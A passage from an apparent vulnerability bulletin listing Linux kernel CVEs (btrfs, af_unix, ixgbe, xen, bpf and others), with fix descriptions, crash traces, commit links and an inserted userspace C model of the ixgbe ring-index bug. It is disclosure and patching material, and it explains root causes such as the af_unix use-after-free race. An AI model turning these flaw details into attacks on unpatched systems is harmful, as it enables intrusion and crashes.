bq27xxx_battery_devices list to before cancelling the delayed_work item. | 2025-12-24 | not yet calculated | CVE-2023-54079 | https://git.kernel.org/stable/c/4c9615474fb0a41cfad658d78db3c9ec70912969 https://git.kernel.org/stable/c/465d919151a1e8d40daf366b868914f59d073211 https://git.kernel.org/stable/c/0c5f4cec759679c290720fbcf6bb81768e21c95b https://git.kernel.org/stable/c/e85757da9091998276ff21a13915ac25229cc232 https://git.kernel.org/stable/c/e98e5bebfcafc75a7b41192a607dfea5c1268afa https://git.kernel.org/stable/c/d952a1eaafcc5f0351caad5dbe9b5b3300d1d529 https://git.kernel.org/stable/c/b12faeca0e819ea09051a705fef9df7ea7e9e18c https://git.kernel.org/stable/c/c00bc80462afc7963f449d7f21d896d2f629cacc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: zoned: skip splitting and logical rewriting on pre-alloc write When doing a relocation, there is a chance that at the time of btrfs_reloc_clone_csums(), there is no checksum for the corresponding region. In this case, btrfs_finish_ordered_zoned()'s sum points to an invalid item and so ordered_extent's logical is set to some invalid value. Then, btrfs_lookup_block_group() in btrfs_zone_finish_endio() failed to find a block group and will hit an assert or a null pointer dereference as following. This can be reproduced by running btrfs/028 several times (e.g, 4 to 16 times) with a null_blk setup. The device's zone size and capacity are set to 32 MB and the storage size is set to 5 GB on my setup. KASAN: null-ptr-deref in range [0x0000000000000088-0x000000000000008f] CPU: 6 PID: 3105720 Comm: kworker/u16:13 Tainted: G W 6.5.0-rc6-kts+ #1 Hardware name: Supermicro Super Server/X10SRL-F, BIOS 2.0 12/17/2015 Workqueue: btrfs-endio-write btrfs_work_helper [btrfs] RIP: 0010:btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs] Code: 41 54 49 89 fc 55 48 89 f5 53 e8 57 7d fc ff 48 8d b8 88 00 00 00 48 89 c3 48 b8 00 00 00 00 00 > 3c 02 00 0f 85 02 01 00 00 f6 83 88 00 00 00 01 0f 84 a8 00 00 RSP: 0018:ffff88833cf87b08 EFLAGS: 00010206 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000011 RSI: 0000000000000004 RDI: 0000000000000088 RBP: 0000000000000002 R08: 0000000000000001 R09: ffffed102877b827 R10: ffff888143bdc13b R11: ffff888125b1cbc0 R12: ffff888143bdc000 R13: 0000000000007000 R14: ffff888125b1cba8 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff88881e500000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f3ed85223d5 CR3: 00000001519b4005 CR4: 00000000001706e0 Call Trace: <TASK> ? die_addr+0x3c/0xa0 ? exc_general_protection+0x148/0x220 ? asm_exc_general_protection+0x22/0x30 ? btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs] ? btrfs_zone_finish_endio.part.0+0x19/0x160 [btrfs] btrfs_finish_one_ordered+0x7b8/0x1de0 [btrfs] ? rcu_is_watching+0x11/0xb0 ? lock_release+0x47a/0x620 ? btrfs_finish_ordered_zoned+0x59b/0x800 [btrfs] ? __pfx_btrfs_finish_one_ordered+0x10/0x10 [btrfs] ? btrfs_finish_ordered_zoned+0x358/0x800 [btrfs] ? __smp_call_single_queue+0x124/0x350 ? rcu_is_watching+0x11/0xb0 btrfs_work_helper+0x19f/0xc60 [btrfs] ? __pfx_try_to_wake_up+0x10/0x10 ? _raw_spin_unlock_irq+0x24/0x50 ? rcu_is_watching+0x11/0xb0 process_one_work+0x8c1/0x1430 ? __pfx_lock_acquire+0x10/0x10 ? __pfx_process_one_work+0x10/0x10 ? __pfx_do_raw_spin_lock+0x10/0x10 ? _raw_spin_lock_irq+0x52/0x60 worker_thread+0x100/0x12c0 ? __kthread_parkme+0xc1/0x1f0 ? __pfx_worker_thread+0x10/0x10 kthread+0x2ea/0x3c0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x30/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> On the zoned mode, writing to a pre-allocated region means a data relocation write. Such a write always uses the WRITE command, so there is no need for splitting and rewriting the logical address. Thus, we can just skip the function for this case. | 2025-12-24 | not yet calculated | CVE-2023-54080 | https://git.kernel.org/stable/c/d3cfa44164688a076e8b476cafb5df87d07cfa63 https://git.kernel.org/stable/c/c02d35d89b317994bd713ba82e160c5e7f22d9c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xen: speed up grant-table reclaim When a grant entry is still in use by the remote domain, Linux must put it on a deferred list. Normally, this list is very short, because the PV network and block protocols expect the backend to unmap the grant first. However, Qubes OS's GUI protocol is subject to the constraints of the X Window System, and as such winds up with the frontend unmapping the window first. As a result, the list can grow very large, resulting in a massive memory leak and eventual VM freeze. To partially solve this problem, make the number of entries that the VM will attempt to free at each iteration tunable. The default is still 10, but it can be overridden via a module parameter. This is Cc: stable because (when combined with appropriate userspace changes) it fixes a severe performance and stability problem for Qubes OS users. | 2025-12-24 | not yet calculated | CVE-2023-54081 | https://git.kernel.org/stable/c/cd1a8952ff529adc210e62306849fd6f256608c0 https://git.kernel.org/stable/c/c76d96c555895ac602c1587b001e5cf656abc371 https://git.kernel.org/stable/c/c04e9894846c663f3278a414f34416e6e45bbe68 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix null-ptr-deref in unix_stream_sendpage(). Bing-Jhong Billy Jheng reported null-ptr-deref in unix_stream_sendpage() with detailed analysis and a nice repro. unix_stream_sendpage() tries to add data to the last skb in the peer's recv queue without locking the queue. If the peer's FD is passed to another socket and the socket's FD is passed to the peer, there is a loop between them. If we close both sockets without receiving FD, the sockets will be cleaned up by garbage collection. The garbage collection iterates such sockets and unlinks skb with FD from the socket's receive queue under the queue's lock. So, there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free. To avoid the issue, unix_stream_sendpage() must lock the peer's recv queue. Note the issue does not exist in 6.5+ thanks to the recent sendpage() refactoring. This patch is originally written by Linus Torvalds. BUG: unable to handle page fault for address: ffff988004dd6870 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 P4D 0 PREEMPT SMP PTI CPU: 4 PID: 297 Comm: garbage_uaf Not tainted 6.1.46 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:kmem_cache_alloc_node+0xa2/0x1e0 Code: c0 0f 84 32 01 00 00 41 83 fd ff 74 10 48 8b 00 48 c1 e8 3a 41 39 c5 0f 85 1c 01 00 00 41 8b 44 24 28 49 8b 3c 24 48 8d 4a 40 <49> 8b 1c 06 4c 89 f0 65 48 0f c7 0f 0f 94 c0 84 c0 74 a1 41 8b 44 RSP: 0018:ffffc9000079fac0 EFLAGS: 00000246 RAX: 0000000000000070 RBX: 0000000000000005 RCX: 000000000001a284 RDX: 000000000001a244 RSI: 0000000000400cc0 RDI: 000000000002eee0 RBP: 0000000000400cc0 R08: 0000000000400cc0 R09: 0000000000000003 R10: 0000000000000001 R11: 0000000000000000 R12: ffff888003970f00 R13: 00000000ffffffff R14: ffff988004dd6800 R15: 00000000000000e8 FS: 00007f174d6f3600(0000) GS:ffff88807db00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff988004dd6870 CR3: 00000000092be000 CR4: 00000000007506e0 PKRU: 55555554 Call Trace: <TASK> ? __die_body.cold+0x1a/0x1f ? page_fault_oops+0xa9/0x1e0 ? fixup_exception+0x1d/0x310 ? exc_page_fault+0xa8/0x150 ? asm_exc_page_fault+0x22/0x30 ? kmem_cache_alloc_node+0xa2/0x1e0 ? __alloc_skb+0x16c/0x1e0 __alloc_skb+0x16c/0x1e0 alloc_skb_with_frags+0x48/0x1e0 sock_alloc_send_pskb+0x234/0x270 unix_stream_sendmsg+0x1f5/0x690 sock_sendmsg+0x5d/0x60 ____sys_sendmsg+0x210/0x260 ___sys_sendmsg+0x83/0xd0 ? kmem_cache_alloc+0xc6/0x1c0 ? avc_disable+0x20/0x20 ? percpu_counter_add_batch+0x53/0xc0 ? alloc_empty_file+0x5d/0xb0 ? alloc_file+0x91/0x170 ? alloc_file_pseudo+0x94/0x100 ? __fget_light+0x9f/0x120 __sys_sendmsg+0x54/0xa0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x69/0xd3 RIP: 0033:0x7f174d639a7d Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 8a c1 f4 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 de c1 f4 ff 48 RSP: 002b:00007ffcb563ea50 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f174d639a7d RDX: 0000000000000000 RSI: 00007ffcb563eab0 RDI: 0000000000000007 RBP: 00007ffcb563eb10 R08: 0000000000000000 R09: 00000000ffffffff R10: 00000000004040a0 R11: 0000000000000293 R12: 00007ffcb563ec28 R13: 0000000000401398 R14: 0000000000403e00 R15: 00007f174d72c000 </TASK> | 2025-12-24 | not yet calculated | CVE-2023-54082 | https://git.kernel.org/stable/c/c080cee930303124624fe64fc504f66c815ee6b9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: phy: tegra: xusb: Clear the driver reference in usb-phy dev For the dual-role port, it will assign the phy dev to usb-phy dev and use the port dev driver as the dev driver of usb-phy. When we try to destroy the port dev, it will destroy its dev driver as well. But we did not remove the reference from usb-phy dev. This might cause the use-after-free issue in KASAN. | 2025-12-24 | not yet calculated | CVE-2023-54083 | https://git.kernel.org/stable/c/b6a107c52073496d2e5d2837915f59fb3103832f https://git.kernel.org/stable/c/b84998a407a882991916b1a61d987c400d8a0ce6 https://git.kernel.org/stable/c/238edc04ddb9d272b38f5419bcd419ad3b92b91b https://git.kernel.org/stable/c/82187460347ad58fd6b06d2883da73c3f2df9631 https://git.kernel.org/stable/c/c0c2fcb1325d0d4f3b322b5ee49385f8eca2560d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: firewire-digi00x: prevent potential use after free This code was supposed to return an error code if init_stream() failed, but it instead freed dg00x->rx_stream and returned success. This potentially leads to a use after free. | 2025-12-24 | not yet calculated | CVE-2023-54084 | https://git.kernel.org/stable/c/5009aead17f060753428e249eb0246eb1c2f8b86 https://git.kernel.org/stable/c/13c5fa1248bf06e95a25907c1be83948b8c44c50 https://git.kernel.org/stable/c/bbb5ac533ca6c4e2775a95388c9c0c610bb442b7 https://git.kernel.org/stable/c/ee1a221d947809c0308f27567c07a3ac93406057 https://git.kernel.org/stable/c/67148395efa2c1fb20e98fca359b20e7a6c81fe4 https://git.kernel.org/stable/c/c0e72058d5e21982e61a29de6b098f7c1f0db498 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix NULL pointer dereference on fastopen early fallback In case of early fallback to TCP, subflow_syn_recv_sock() deletes the subflow context before returning the newly allocated sock to the caller. The fastopen path does not cope with the above unconditionally dereferencing the subflow context. | 2025-12-24 | not yet calculated | CVE-2023-54085 | https://git.kernel.org/stable/c/95135835519b0ab931c39908b2c99e9fb3c9068b https://git.kernel.org/stable/c/c0ff6f6da66a7791a32c0234388b1bdc00244917 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Add preempt_count_{sub,add} into btf id deny list The recursion check in __bpf_prog_enter* and __bpf_prog_exit* leaves preempt_count_{sub,add} unprotected. When attaching trampoline to them we get panic as follows, [ 867.843050] BUG: TASK stack guard page was hit at 0000000009d325cf (stack is 0000000046a46a15..00000000537e7b28) [ 867.843064] stack guard page: 0000 [#1] PREEMPT SMP NOPTI [ 867.843067] CPU: 8 PID: 11009 Comm: trace Kdump: loaded Not tainted 6.2.0+ #4 [ 867.843100] Call Trace: [ 867.843101] <TASK> [ 867.843104] asm_exc_int3+0x3a/0x40 [ 867.843108] RIP: 0010:preempt_count_sub+0x1/0xa0 [ 867.843135] __bpf_prog_enter_recur+0x17/0x90 [ 867.843148] bpf_trampoline_6442468108_0+0x2e/0x1000 [ 867.843154] ? preempt_count_sub+0x1/0xa0 [ 867.843157] preempt_count_sub+0x5/0xa0 [ 867.843159] ? migrate_enable+0xac/0xf0 [ 867.843164] __bpf_prog_exit_recur+0x2d/0x40 [ 867.843168] bpf_trampoline_6442468108_0+0x55/0x1000 ... [ 867.843788] preempt_count_sub+0x5/0xa0 [ 867.843793] ? migrate_enable+0xac/0xf0 [ 867.843829] __bpf_prog_exit_recur+0x2d/0x40 [ 867.843837] BUG: IRQ stack guard page was hit at 0000000099bd8228 (stack is 00000000b23e2bc4..000000006d95af35) [ 867.843841] BUG: IRQ stack guard page was hit at 000000005ae07924 (stack is 00000000ffd69623..0000000014eb594c) [ 867.843843] BUG: IRQ stack guard page was hit at 00000000028320f0 (stack is 00000000034b6438..0000000078d1bcec) [ 867.843842] bpf_trampoline_6442468108_0+0x55/0x1000 ... That is because in __bpf_prog_exit_recur, the preempt_count_{sub,add} are called after prog->active is decreased. Fix this by adding these two functions into the btf ids deny list. | 2025-12-24 | not yet calculated | CVE-2023-54086 | https://git.kernel.org/stable/c/095018267c87b8bfbbb12eeb1c0ebf2359e1782c https://git.kernel.org/stable/c/60039bf72f81638baa28652a11a68e9b0b7b5b2d https://git.kernel.org/stable/c/b9168d41b83d182f34ba927ee822edaee18d5fc8 https://git.kernel.org/stable/c/c11bd046485d7bf1ca200db0e7d0bdc4bafdd395 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubi: Fix possible null-ptr-deref in ubi_free_volume() It will cause null-ptr-deref in the following case: uif_init() ubi_add_volume() cdev_add() -> if it fails, call kill_volumes() device_register() kill_volumes() -> if ubi_add_volume() fails call this function ubi_free_volume() cdev_del() device_unregister() -> trying to delete a not added device, it causes null-ptr-deref So in ubi_free_volume(), it deletes devices whether they are added or not, which will cause null-ptr-deref. Handle the error case while calling ubi_add_volume() to fix this problem. If add volume fails, set the corresponding vol to null, so it can not be accessed in kill_volumes() and release the resource in ubi_add_volume() error path. | 2025-12-24 | not yet calculated | CVE-2023-54087 | https://git.kernel.org/stable/c/5558bcf1c58720ca6e9d6198d921cb3aa337f038 https://git.kernel.org/stable/c/45b2c5ca4d2edae70f19fdb086bd927840c4c309 https://git.kernel.org/stable/c/234c53e57424992e657e6f4acc00d3df0983176f https://git.kernel.org/stable/c/fcbc795abe7897da4b5d2a6ab5010e36774b00c2 https://git.kernel.org/stable/c/5ec4c8aca5a221756a9007deadfea92795319fee https://git.kernel.org/stable/c/2ea7195b195009ecf0046e55361f393ba96d02db https://git.kernel.org/stable/c/9eccdb0760cbcb4427b5303a83a3007de998af51 https://git.kernel.org/stable/c/c15859bfd326c10230f09cb48a17f8a35f190342 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: hold queue_lock when removing blkg->q_node When blkg is removed from q->blkg_list from blkg_free_workfn(), queue_lock has to be held, otherwise, all kinds of bugs (list corruption, hard lockup, ..) can be triggered from blkg_destroy_all(). | 2025-12-24 | not yet calculated | CVE-2023-54088 | https://git.kernel.org/stable/c/b5dae1cd0d8368b4338430ff93403df67f0b8bcc https://git.kernel.org/stable/c/083b58373463a6e5ee60ecb135269348f68ad7df https://git.kernel.org/stable/c/cd4ffdf56791eec95af01f06bee1ec7665ca75c4 https://git.kernel.org/stable/c/c164c7bc9775be7bcc68754bb3431fce5823822e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio_pmem: add the missing REQ_OP_WRITE for flush bio When doing mkfs.xfs on a pmem device, the following warning was ------------[ cut here ]------------ WARNING: CPU: 2 PID: 384 at block/blk-core.c:751 submit_bio_noacct Modules linked in: CPU: 2 PID: 384 Comm: mkfs.xfs Not tainted 6.4.0-rc7+ #154 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) RIP: 0010:submit_bio_noacct+0x340/0x520 ...... Call Trace: <TASK> ? submit_bio_noacct+0xd5/0x520 submit_bio+0x37/0x60 async_pmem_flush+0x79/0xa0 nvdimm_flush+0x17/0x40 pmem_submit_bio+0x370/0x390 __submit_bio+0xbc/0x190 submit_bio_noacct_nocheck+0x14d/0x370 submit_bio_noacct+0x1ef/0x520 submit_bio+0x55/0x60 submit_bio_wait+0x5a/0xc0 blkdev_issue_flush+0x44/0x60 The root cause is that submit_bio_noacct() needs bio_op() to be either WRITE or ZONE_APPEND for a flush bio, and async_pmem_flush() doesn't assign REQ_OP_WRITE when allocating the flush bio, so submit_bio_noacct just fails the flush bio. Simply fix it by adding the missing REQ_OP_WRITE for the flush bio. And we could fix the flush order issue and do flush optimization later. | 2025-12-24 | not yet calculated | CVE-2023-54089 | https://git.kernel.org/stable/c/e39e870e1e683a71d3d2e63e661a5695f60931a7 https://git.kernel.org/stable/c/c7ab7e45ccef209809f8c2b00f497deec06b29c0 https://git.kernel.org/stable/c/c1dbd8a849183b9c12d257ad3043ecec50db50b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ixgbe: Fix panic during XDP_TX with > 64 CPUs Commit 4fe815850bdc ("ixgbe: let the xdpdrv work with more than 64 cpus") adds support to allow XDP programs to run on systems with more than 64 CPUs by locking the XDP TX rings and indexing them using cpu % 64 (IXGBE_MAX_XDP_QS). Upon trying out this patch on a system with more than 64 cores, the kernel panicked with an array-index-out-of-bounds at the return in ixgbe_determine_xdp_ring in ixgbe.h, which means ixgbe_determine_xdp_q_idx was just returning the cpu instead of cpu % IXGBE_MAX_XDP_QS. An example splat: ========================================================================== UBSAN: array-index-out-of-bounds in /var/lib/dkms/ixgbe/5.18.6+focal-1/build/src/ixgbe.h:1147:26 index 65 is out of range for type 'ixgbe_ring *[64]' ========================================================================== BUG: kernel NULL pointer dereference, address: 0000000000000058 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 65 PID: 408 Comm: ksoftirqd/65 Tainted: G IOE 5.15.0-48-generic #54~20.04.1-Ubuntu Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.5.4 01/13/2020 RIP: 0010:ixgbe_xmit_xdp_ring+0x1b/0x1c0 [ixgbe] Code: 3b 52 d4 cf e9 42 f2 ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 55 b9 00 00 00 00 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 08 <44> 0f b7 47 58 0f b7 47 5a 0f b7 57 54 44 0f b7 76 08 66 41 39 c0 RSP: 0018:ffffbc3fcd88fcb0 EFLAGS: 00010282 RAX: ffff92a253260980 RBX: ffffbc3fe68b00a0 RCX: 0000000000000000 RDX: ffff928b5f659000 RSI: ffff928b5f659000 RDI: 0000000000000000 RBP: ffffbc3fcd88fce0 R08: ffff92b9dfc20580 R09: 0000000000000001 R10: 3d3d3d3d3d3d3d3d R11: 3d3d3d3d3d3d3d3d R12: 0000000000000000 R13: ffff928b2f0fa8c0 R14: ffff928b9be20050 R15: 000000000000003c FS: 0000000000000000(0000) GS:ffff92b9dfc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000058 CR3: 000000011dd6a002 CR4: 00000000007706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <TASK> ixgbe_poll+0x103e/0x1280 [ixgbe] ? sched_clock_cpu+0x12/0xe0 __napi_poll+0x30/0x160 net_rx_action+0x11c/0x270 __do_softirq+0xda/0x2ee run_ksoftirqd+0x2f/0x50 smpboot_thread_fn+0xb7/0x150 ? sort_range+0x30/0x30 kthread+0x127/0x150 ? set_kthread_struct+0x50/0x50 ret_from_fork+0x1f/0x30 </TASK> I think this is how it happens: Upon loading the first XDP program on a system with more than 64 CPUs, ixgbe_xdp_locking_key is incremented in ixgbe_xdp_setup. However, immediately after this, the rings are reconfigured by ixgbe_setup_tc. ixgbe_setup_tc calls ixgbe_clear_interrupt_scheme which calls ixgbe_free_q_vectors which calls ixgbe_free_q_vector in a loop. ixgbe_free_q_vector decrements ixgbe_xdp_locking_key once per call if it is non-zero. Commenting out the decrement in ixgbe_free_q_vector stopped my system from panicking. I suspect to make the original patch work, I would need to load an XDP program and then replace it in order to get ixgbe_xdp_locking_key back above 0 since ixgbe_setup_tc is only called when transitioning between XDP and non-XDP ring configurations, while ixgbe_xdp_locking_key is incremented every time ixgbe_xdp_setup is called. Also, ixgbe_setup_tc can be called via ethtool --set-channels, so this becomes another path to decrement ixgbe_xdp_locking_key to 0 on systems with more than 64 CPUs. Since ixgbe_xdp_locking_key only protects the XDP_TX path and is tied to the number of CPUs present, there is no reason to disable it upon unloading an XDP program. To avoid confusion, I have moved enabling ixgbe_xdp_locking_key into ixgbe_sw_init, which is part of the probe path. | 2025-12-24 | not yet calculated | CVE-2023-54090 | https://git.kernel.org/stable/c/1924450175349e64f8dfc3689efcb653dba0418e https://git.kernel.org/stable/c/785b2b5b47b1aa4c31862948b312ea845401c5ec https://git.kernel.org/stable/c/4cd43a19900d0b98c1ec4bb6984763369d2e19ec https://git.kernel.org/stable/c/c23ae5091a8b3e50fe755257df020907e7c029bb |
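Added example for the ixgbe entry above; this is not ixgbe code and not part of the advisory. It models in userspace why the ring index stops being reduced modulo 64: an int counter stands in for the static key, NR_CPUS_EXAMPLE (96) is a constructed host, and the function names are this example's own. IXGBE_MAX_XDP_QS (64) is the value the entry gives.

```c
/*
 * Added example, not ixgbe code: a userspace model of the locking-key
 * accounting described in the CVE-2023-54090 entry. The int counter
 * standing in for the static key, NR_CPUS_EXAMPLE and the function
 * names are this example's assumptions; IXGBE_MAX_XDP_QS comes from
 * the entry.
 */
#include <stdbool.h>
#include <stdio.h>

#define IXGBE_MAX_XDP_QS 64    /* number of XDP TX rings in the driver's array */
#define NR_CPUS_EXAMPLE  96    /* constructed: a host with more than 64 CPUs */

/* Stand-in for ixgbe_xdp_locking_key: "enabled" while the count is > 0. */
static int xdp_locking_key;

/* Same shape as ixgbe_determine_xdp_q_idx(): reduce modulo the ring count
 * only while the key is enabled, otherwise hand back the raw CPU number. */
int xdp_q_idx(int cpu)
{
    if (xdp_locking_key > 0)
        return cpu % IXGBE_MAX_XDP_QS;
    return cpu;
}

/* True when the index can legally address the 64-entry ring array. */
bool xdp_q_idx_in_bounds(int idx)
{
    return idx >= 0 && idx < IXGBE_MAX_XDP_QS;
}

/* Pre-fix flow: the key is bumped when an XDP program is attached ... */
static void buggy_xdp_setup(int nr_cpus)
{
    if (nr_cpus > IXGBE_MAX_XDP_QS)
        xdp_locking_key++;
}

/* ... and dropped once per freed q_vector by the ring reconfiguration that
 * ixgbe_setup_tc() runs right after the first attach (and again on
 * ethtool --set-channels), which drives the count back to zero. */
static void buggy_free_q_vectors(int nr_q_vectors)
{
    for (int i = 0; i < nr_q_vectors; i++)
        if (xdp_locking_key > 0)
            xdp_locking_key--;
}

/* Post-fix flow: decide once at probe time from the CPU count (the entry's
 * ixgbe_sw_init move) and never touch the key on attach, detach or
 * ring reconfiguration. */
static void fixed_sw_init(int nr_cpus)
{
    xdp_locking_key = nr_cpus > IXGBE_MAX_XDP_QS ? 1 : 0;
}

/* Ring index the pre-fix driver would use for `cpu` on the first XDP_TX
 * after attaching a program (attach, then the reconfiguration it triggers). */
int buggy_index_after_first_attach(int cpu)
{
    xdp_locking_key = 0;
    buggy_xdp_setup(NR_CPUS_EXAMPLE);
    buggy_free_q_vectors(NR_CPUS_EXAMPLE);
    return xdp_q_idx(cpu);
}

/* Ring index the fixed driver uses for `cpu`; reconfiguration no longer
 * touches the key, so there is nothing further to model. */
int fixed_index(int cpu)
{
    fixed_sw_init(NR_CPUS_EXAMPLE);
    return xdp_q_idx(cpu);
}

int main(void)
{
    int cpu = 65;   /* ksoftirqd/65 in the splat above */
    int bad = buggy_index_after_first_attach(cpu);
    int good = fixed_index(cpu);

    printf("cpu %d: pre-fix index %d (%s), fixed index %d (%s)\n",
           cpu, bad, xdp_q_idx_in_bounds(bad) ? "ok" : "OUT OF BOUNDS",
           good, xdp_q_idx_in_bounds(good) ? "ok" : "OUT OF BOUNDS");
    return 0;
}
```

The point to check on a real box is the same one the model makes: the guard that reduces the index must be derived from a property that does not change (the CPU count at probe), not from a refcount that unrelated reconfiguration paths can drive to zero.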
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/client: Fix memory leak in drm_client_target_cloned dmt_mode is allocated and never freed in this function. It was found with the ast driver, but most drivers using generic fbdev setup are probably affected. This fixes the following kmemleak report: backtrace: [<00000000b391296d>] drm_mode_duplicate+0x45/0x220 [drm] [<00000000e45bb5b3>] drm_client_target_cloned.constprop.0+0x27b/0x480 [drm] [<00000000ed2d3a37>] drm_client_modeset_probe+0x6bd/0xf50 [drm] [<0000000010e5cc9d>] __drm_fb_helper_initial_config_and_unlock+0xb4/0x2c0 [drm_kms_helper] [<00000000909f82ca>] drm_fbdev_client_hotplug+0x2bc/0x4d0 [drm_kms_helper] [<00000000063a69aa>] drm_client_register+0x169/0x240 [drm] [<00000000a8c61525>] ast_pci_probe+0x142/0x190 [ast] [<00000000987f19bb>] local_pci_probe+0xdc/0x180 [<000000004fca231b>] work_for_cpu_fn+0x4e/0xa0 [<0000000000b85301>] process_one_work+0x8b7/0x1540 [<000000003375b17c>] worker_thread+0x70a/0xed0 [<00000000b0d43cd9>] kthread+0x29f/0x340 [<000000008d770833>] ret_from_fork+0x1f/0x30 unreferenced object 0xff11000333089a00 (size 128): | 2025-12-24 | not yet calculated | CVE-2023-54091 | https://git.kernel.org/stable/c/d3009700f48602b557eade1f22c98b6bc20247e8 https://git.kernel.org/stable/c/a4b978249e8fa94956fce8b70a709f7797716f62 https://git.kernel.org/stable/c/52daf6ba2e0d201640cb1ce42049c5c4426b4d6e https://git.kernel.org/stable/c/105275879a80503686a8108af2f5c579a1c5aef4 https://git.kernel.org/stable/c/a85e23a1ef63e45a18f0a30d7816fcb4a865ca95 https://git.kernel.org/stable/c/b5359d7a5087ac398fc429da6833133b4784c268 https://git.kernel.org/stable/c/4b596a6e2d2e0f9c14e4122506dd715f43fcd727 https://git.kernel.org/stable/c/c2a88e8bdf5f6239948d75283d0ae7e0c7945b03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: s390: pv: fix index value of replaced ASCE The index field of the struct page corresponding to a guest ASCE should be 0. When replacing the ASCE in s390_replace_asce(), the index of the new ASCE should also be set to 0. Having the wrong index might lead to the wrong addresses being passed around when notifying pte invalidations, and eventually to validity intercepts (VM crash) if the prefix gets unmapped and the notifier gets called with the wrong address. | 2025-12-24 | not yet calculated | CVE-2023-54092 | https://git.kernel.org/stable/c/8e635da0e0d3cb45e32fa79b36218fb98281bc10 https://git.kernel.org/stable/c/49a2686adddebe1ae76b4d368383208656ef6606 https://git.kernel.org/stable/c/017f686bcb536ff23d49c143fdf9d1fd89a9a924 https://git.kernel.org/stable/c/f1c7a776338f2ac5e34da40e58fe9f33ea390a5e https://git.kernel.org/stable/c/c2fceb59bbda16468bda82b002383bff59de89ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: anysee: fix null-ptr-deref in anysee_master_xfer In anysee_master_xfer, msg is controlled by user. When msg[i].buf is null and msg[i].len is zero, former checks on msg[i].buf would be passed. Malicious data finally reach anysee_master_xfer. If accessing msg[i].buf[0] without sanity check, null ptr deref would happen. We add check on msg[i].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") [hverkuil: add spaces around +] | 2025-12-24 | not yet calculated | CVE-2023-54093 | https://git.kernel.org/stable/c/73c0b224ceeba12dee2a7a8cbc147648da0b2e63 https://git.kernel.org/stable/c/e04affec2506ff5c12a18d78d7e694b3556a8982 https://git.kernel.org/stable/c/8dc5b370254abc10f0cb4141d90cecf7ce465472 https://git.kernel.org/stable/c/4a9763d2bc4a6d6fab42555b9c0b2eefa32585ac https://git.kernel.org/stable/c/3dd5846a873938ec7b6d404ec27662942cd8f2ef https://git.kernel.org/stable/c/14b94154a72388b57221a2a73795c0ea61a95373 https://git.kernel.org/stable/c/5975dbbb7ad0767eaabd15d2c37a739ac76acb00 https://git.kernel.org/stable/c/c30411266fd67ea3c02a05c157231654d5a3bdc9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: prevent skb corruption on frag list segmentation Ian reported several skb corruptions triggered by rx-gro-list, collecting different oops alike: [ 62.624003] BUG: kernel NULL pointer dereference, address: 00000000000000c0 [ 62.631083] #PF: supervisor read access in kernel mode [ 62.636312] #PF: error_code(0x0000) - not-present page [ 62.641541] PGD 0 P4D 0 [ 62.644174] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 62.648629] CPU: 1 PID: 913 Comm: napi/eno2-79 Not tainted 6.4.0 #364 [ 62.655162] Hardware name: Supermicro Super Server/A2SDi-12C-HLN4F, BIOS 1.7a 10/13/2022 [ 62.663344] RIP: 0010:__udp_gso_segment (./include/linux/skbuff.h:2858 ./include/linux/udp.h:23 net/ipv4/udp_offload.c:228 net/ipv4/udp_offload.c:261 net/ipv4/udp_offload.c:277) [ 62.687193] RSP: 0018:ffffbd3a83b4f868 EFLAGS: 00010246 [ 62.692515] RAX: 00000000000000ce RBX: 0000000000000000 RCX: 0000000000000000 [ 62.699743] RDX: ffffa124def8a000 RSI: 0000000000000079 